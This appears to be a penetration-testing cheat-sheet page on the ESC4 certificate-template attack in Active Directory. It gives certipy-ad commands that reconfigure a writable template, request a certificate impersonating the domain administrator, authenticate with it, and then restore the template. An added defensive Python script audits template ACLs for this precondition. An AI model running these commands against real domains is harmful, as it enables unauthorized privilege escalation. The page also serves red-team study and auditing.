Technique

ESC4

 

If you are granted write access to a certificate template, you can reconfigure it so that it becomes vulnerable to ESC1.

1.0 certipy-ad

1.1 Configure template

certipy-ad template -username $user@$domain.local -password $password -template $vuln_template -save-old

1.2 Exploit ESC1

certipy-ad req -username $user@$domain.local -password $password -ca '$TARGET-CA' -target $target.$domain.local -template $vuln_template -upn administrator@$domain.local
 
certipy-ad auth -pfx administrator.pfx

1.3 Restore configuration

certipy-ad template -username $user@$domain.local -password $password -template $vuln_template -configuration $vuln_template.json
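
The precondition for all of the above is a template ACL that gives write access to a principal that should not have it. The following Python is an added example for auditing that condition; it is not part of the original page or of Certipy. It parses a template's security descriptor in SDDL form and lists allow ACEs that grant write-class rights to trustees outside an expected set. The sample SDDL, the SID in it and the `PRIVILEGED` set are constructed assumptions.

```python
import re

# SDDL right codes that let a trustee rewrite a template (the ESC4 precondition).
SDDL_WRITE = {"GA": "GenericAll", "GW": "GenericWrite", "WP": "WriteProperty",
              "WD": "WriteDacl", "WO": "WriteOwner"}
# The same rights as access-mask bits, for ACEs whose rights field is hex.
MASK_WRITE = {0x10000000: "GenericAll", 0x40000000: "GenericWrite",
              0x00000020: "WriteProperty", 0x00040000: "WriteDacl",
              0x00080000: "WriteOwner"}
# Assumption: only these trustees are expected to hold write access.
# SY=SYSTEM, BA=Administrators, DA=Domain Admins, EA=Enterprise Admins.
PRIVILEGED = {"SY", "BA", "DA", "EA"}

# Constructed sample: security descriptor of a hypothetical template.
SAMPLE_SDDL = (
    "O:EAG:EAD:PAI"
    "(A;;RPWPCCDCLCSWRCWDWOGA;;;EA)"
    "(A;;RPLCLORC;;;AU)"
    "(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)"  # Enroll extended right
    "(A;;RPWPRC;;;DU)"
    "(A;;0xf01ff;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "S:AI(AU;SA;WPWDWO;;;WD)"
)

def write_rights(rights):
    """Return the write-class rights named in one ACE rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return sorted(n for bit, n in MASK_WRITE.items() if mask & bit)
    codes = re.findall("..", rights)  # SDDL rights are two-letter codes
    return sorted(SDDL_WRITE[c] for c in codes if c in SDDL_WRITE)

def audit_template_sddl(sddl):
    """List (trustee, rights) for allow ACEs that let a non-privileged trustee modify the template."""
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        fields = ace.split(";")
        # Only allow ACEs (A, OA) grant access; audit ACEs in the SACL are skipped.
        if len(fields) < 6 or fields[0] not in ("A", "OA"):
            continue
        trustee, hits = fields[5], write_rights(fields[2])
        if hits and trustee not in PRIVILEGED:
            findings.append((trustee, hits))
    return findings

if __name__ == "__main__":
    for trustee, rights in audit_template_sddl(SAMPLE_SDDL):
        print(f"{trustee}: {', '.join(rights)}")
```

A WriteProperty finding on an object ACE (type `OA`) is scoped to the attribute or property set named by its GUID, so review those individually before treating them as full template write access.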
